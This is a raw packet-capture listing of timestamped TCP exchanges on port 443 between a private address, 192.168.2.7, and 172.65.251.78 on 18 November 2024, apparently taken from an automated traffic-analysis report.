                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064083099 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064153910 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064193010 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064208031 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064270973 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064280033 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064310074 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064328909 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064383984 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064383984 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064383984 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064402103 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064469099 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064580917 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064596891 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064714909 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064742088 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064810038 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064810038 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064810038 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064810038 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064820051 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064927101 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.064940929 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065027952 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065037012 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065046072 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065064907 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065185070 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065197945 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065285921 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065285921 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065285921 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065285921 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065295935 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065351009 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065368891 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065373898 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065381050 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065500021 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065500021 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065505981 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065519094 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065540075 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065642118 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065642118 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065642118 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065650940 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065743923 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065762997 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065793991 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065793991 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065803051 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065893888 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.065893888 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066037893 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066052914 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066143990 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066154003 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066241026 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066306114 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066323996 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066412926 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066443920 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066464901 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066464901 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066466093 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066474915 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066601038 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066621065 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066679001 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066696882 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066730976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066730976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066730976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066730976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066750050 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066900969 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066916943 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066998959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066998959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066998959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.066998959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067018032 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067109108 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067224979 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067240953 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067347050 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067353010 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067446947 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067487955 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067604065 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067616940 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067662954 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067688942 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067713976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067713976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067713976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067713976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067713976 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067723036 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067867041 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067867041 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067867041 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067883015 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067897081 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.067980051 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068002939 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068095922 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068097115 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068097115 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068097115 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068106890 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068202972 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068217993 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068279028 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068298101 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068479061 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068496943 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068531036 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068536997 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068548918 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068563938 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068979979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068979979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068979979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.068991899 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070518017 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070544958 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070652008 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070666075 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070709944 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070724010 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070770025 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070770979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070770979 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070940018 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.070955992 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.071017981 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.071023941 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.071042061 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.071140051 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.105173111 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.105202913 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.105256081 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.105283976 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.105328083 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.105351925 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.105356932 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.105372906 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.106086016 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178081989 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178107023 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178174973 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178183079 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178226948 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178375006 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178390026 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178489923 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178498030 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178569078 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178694963 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178709984 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178776026 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178782940 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.178822994 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179025888 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179043055 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179101944 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179107904 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179174900 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179246902 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179260969 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179335117 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179338932 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179409027 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179440022 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179455042 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179510117 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179517984 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179522991 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179537058 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179605007 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179605961 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179610968 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179682016 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179697990 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179740906 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179740906 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179747105 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179755926 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179776907 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179790020 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179831982 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179836988 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179852962 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179919004 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179929018 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179933071 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.179955959 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180066109 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180079937 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180079937 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180095911 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180131912 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180221081 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180303097 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180320024 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180413961 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180428028 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180516005 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180533886 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180583954 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180589914 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180613041 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180749893 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180763960 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180814028 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180839062 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180843115 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180850029 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180862904 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.180970907 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181046009 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181077957 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181109905 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181124926 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181196928 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181196928 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181219101 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181233883 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181313992 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181319952 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181350946 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181372881 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181412935 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181412935 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181427956 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181437969 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181480885 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181576967 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181591988 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181705952 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181739092 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181742907 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181751013 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181803942 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181803942 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181981087 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.181998014 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182054996 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182084084 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182085991 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182097912 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182146072 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182146072 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182220936 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182245016 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182287931 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182292938 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182398081 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182398081 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182401896 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182416916 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182442904 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182518959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182518959 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182526112 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182545900 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182565928 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182588100 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182598114 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182626009 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182643890 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182775021 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182799101 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182871103 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182888031 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182888031 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182893038 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182904005 CET44349744172.65.251.78192.168.2.7
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182955980 CET49744443192.168.2.7172.65.251.78
                                                                                                                                                                                                              Nov 18, 2024 08:35:27.182955980 CET49744443192.168.2.7172.65.251.78
